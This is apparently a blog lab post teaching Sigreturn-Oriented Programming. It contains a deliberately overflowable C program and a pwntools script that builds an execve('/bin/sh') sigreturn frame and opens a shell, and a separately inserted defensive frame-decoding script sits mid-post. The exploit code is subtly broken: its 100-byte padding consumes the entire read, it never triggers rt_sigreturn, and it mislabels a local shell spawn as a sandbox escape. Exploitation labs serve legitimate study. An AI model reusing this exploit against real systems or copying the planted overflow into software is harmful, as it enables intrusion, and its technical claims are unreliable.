Sigreturn-Oriented Programming (SROP) Lab

woddlwoddl 2024. 5. 8. 01:58

In this lab, we will learn how to develop SROP exploits for sandbox escape.

Lab Activities:

1. Creating a Vulnerable C Program:

First, let's create a vulnerable C program with a syscall instruction.


  #include <stdio.h>
  #include <unistd.h>

  int main() {
      char buf[10];
      read(0, buf, 100);  // Vulnerable syscall: up to 100 bytes are read into a 10-byte stack buffer
      return 0;
  }
  

Save the above code to a file named vulnerable.c and compile it with the following command:

$ gcc -o vulnerable vulnerable.c

2. Writing the Exploit Script:

Now, let's write an exploit script in Python using pwntools to perform SROP for sandbox escape.


  from pwn import *

  # The frame layout is architecture-specific; the lab binary is x86_64
  context.arch = 'amd64'

  # Specify the path to the vulnerable binary
  binary_path = './vulnerable'

  # Build the SROP frame: the register state that rt_sigreturn will restore
  srop_frame = SigreturnFrame()
  srop_frame.rax = 59  # execve syscall number on x86_64
  srop_frame.rdi = 0xdeadbeef  # Address of "/bin/sh" (placeholder; must point at the string in memory)
  srop_frame.rsi = 0x0  # argv = NULL
  srop_frame.rdx = 0x0  # envp = NULL
  srop_frame.rip = 0x4000000  # Address of a syscall instruction (placeholder; take it from the binary)

  # Craft the payload
  payload = b'A' * 100  # Padding up to the saved return address (the offset must match the build)
  payload += bytes(srop_frame)

  # Launch the exploit
  p = process(binary_path)
  p.send(payload)
  p.interactive()
  

Explanation of the Python script:

  • We build a SigreturnFrame object to construct the SROP frame.
  • The SROP frame sets the syscall number for execve, the arguments, and the address of the syscall instruction.
  • We craft the payload with padding and the SROP frame.
  • We launch the vulnerable binary and send the payload to perform the SROP exploit.
  • p.interactive() allows us to interact with the spawned shell.
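To see what bytes(srop_frame) actually serialises, here is an added decoder (not from the post and not pwntools' own code) for the x86_64 ucontext/sigcontext layout that rt_sigreturn consumes; it lets a captured frame be inspected for the register state it would install and flags the execve shape the lab builds. The field order is taken from the kernel uapi headers and is an assumption about the layout; the sample frame is constructed.

```python
import struct

# Body of the x86_64 rt_sigframe that rt_sigreturn consumes: the struct ucontext
# header followed by the general-purpose part of struct sigcontext. Field order is
# taken from the kernel uapi headers (asm/ucontext.h, asm/sigcontext.h); this is
# an assumption about the layout and is not the lab's code or pwntools' own.
FRAME_FIELDS = [
    "uc_flags", "uc_link", "ss_sp", "ss_flags", "ss_size",      # ucontext header
    "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15",
    "rdi", "rsi", "rbp", "rbx", "rdx", "rax", "rcx", "rsp", "rip",
    "eflags", "csgsfs", "err", "trapno", "oldmask", "cr2", "fpstate",
]
FRAME_FMT = "<%dQ" % len(FRAME_FIELDS)
FRAME_SIZE = struct.calcsize(FRAME_FMT)               # 232 bytes
SYSCALL_NAMES = {0: "read", 1: "write", 15: "rt_sigreturn", 59: "execve", 60: "exit"}

def pack_frame(regs):
    """Serialise a register dict into the frame layout (used here to build the sample)."""
    return struct.pack(FRAME_FMT, *[regs.get(f, 0) for f in FRAME_FIELDS])

def decode_frame(blob):
    """Recover the register state a frame would install, or None if the blob is too short."""
    if len(blob) < FRAME_SIZE:
        return None
    return dict(zip(FRAME_FIELDS, struct.unpack_from(FRAME_FMT, blob)))

def triage_frame(blob):
    """Report which syscall rax selects, where rip lands, and whether it has the execve shape."""
    regs = decode_frame(blob)
    if regs is None:
        return {"verdict": "too short to be a sigreturn frame"}
    nr = regs["rax"]
    return {
        "syscall": SYSCALL_NAMES.get(nr, "nr=%d" % nr),
        "rip": regs["rip"],
        "args": (regs["rdi"], regs["rsi"], regs["rdx"]),
        "suspicious": nr == 59,   # a frame that returns into execve is the sandbox-escape shape
    }

# Constructed sample with the register values the lab's script uses (placeholder addresses);
# 0x33 is the user-mode CS selector on x86_64.
SAMPLE = pack_frame({"rax": 59, "rdi": 0xdeadbeef, "rip": 0x4000000, "csgsfs": 0x33})

if __name__ == "__main__":
    print(triage_frame(SAMPLE))
```

On a captured payload, pass the slice that starts where the overwritten return address ends; the lab's own payload is padding followed by the frame.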

3. Exploiting the Vulnerability:

Execute the Python script to exploit the vulnerability:

$ python exploit.py

Once executed, you should have a shell prompt, confirming the successful sandbox escape using SROP.
